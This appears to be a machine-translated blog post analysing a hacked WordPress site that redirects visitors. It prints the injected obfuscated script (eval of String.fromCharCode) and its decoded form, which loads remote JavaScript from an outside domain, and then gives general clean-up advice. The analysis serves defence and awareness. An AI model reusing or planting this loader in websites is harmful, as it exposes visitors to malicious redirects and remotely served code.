Daddy's Notes on Building a Station > Blog > Experience and skill sharing > Share a case of foreign trade WordPress website being maliciously redirected
Wordpress Trojan virus injection case

Share a case of foreign trade WordPress website being maliciously redirected

I saw a webmaster asking WordPress in the group yesterday Website built What is the situation of automatically jumping to other people's websites as soon as you open them. Then the father visited the website where he chatted privately.

WordPress infects malicious redirection code

Open your own website, and when more than half of the website content is loaded, it will automatically jump to a third-party website, and several websites will be skipped consecutively.

At the same time, you will be asked to give notification permission to the website you have jumped to, as shown below:

Chrome notification permission

Then I analyzed the source code of the website (a lot of plug-ins were installed, which led to a lot of js and other code, too messy)

Finally, I found that the following code was abnormal. I asked the next webmaster that it was neither his own nor the plug-ins he installed.

 <script> eval(String.fromCharCode (118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115 , 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56,  44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39,  47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101,  110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97,  103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125)); </script>

Then the father searched the eval (String. fromCharCode) and found the following record article

Record – website is HACK!

Then through jdstiles.com This website parses the meaning of the above code.

 var d=document;var s=d.createElement('script');  s.type='text/javascript'; s.async=true; var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109); s.src=pl+'/stat.js?l=11&';  if (document.currentScript) {  document.currentScript.parentNode.insertBefore(s,  document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); }

Analyze the above figures again, and the following website comes out

 https://blackawardago.com

No matter what website came out, we all know that the website was hacked.

This malicious redirection code, called WordPress in foreign countries, seems to have become popular since 18 years ago. The following are two articles I saw when my father searched for information.

https://www.getastra.com/e/malware/infections/wordpress-redirect-hack-js_charcode_voip_ad-malware

https://stackoverflow.com/questions/52282559/how-to-delete-script-injected-on-wordpress-site-ads-voipnewswire-net

If you want to know whether your website has also hit this malicious redirect code, you can check it through the following website.

https://sitecheck.sucuri.net/

Methods to clear malicious redirection codes in WordPress

Of course, if you hit WordPress, how can you remove the malicious redirection code? (Because the webmaster didn't ask me to help him deal with it, so the father didn't touch the actual code. The following is the general handling method shared)

Solution to understand the code

  1. Find out the malicious code and delete it.
  2. Check all files and codes on the website to see if there are infected and unknown scripts, and delete them.
  3. Check whether the database is infected. If so, delete the infected content.

Solution for not understanding code

  1. Spend money to find a person who can understand the code to help you clean up. I think the foreigner on it is 108 yuan/year.
  2. The website has been deleted and reinstalled to ensure the use of safe themes and plug-ins, ensure that the database is not infected, and ensure the security of the server.

If you see the leader of this article who knows how to clean up this malicious code, or has experience in cleaning up malicious code, please leave a message for advice.

Finally, we recommend a plug-in: Install a firewall for WordPress! Try Wordence

Relevant knowledge: Do a good job of security protection to prevent WordPress website from being hacked

This is the 2nd/20th article in the series: WordPress Security

1/5 - (1 vote)
Recommended articles
Steps to build a website
Steps to build your own website
20240325 6601c9bdb7da7
WordPress host recommendation
AliDropship One Piece Delivery Website
AliExpress One Piece Delivery Website

Related articles

Scroll to top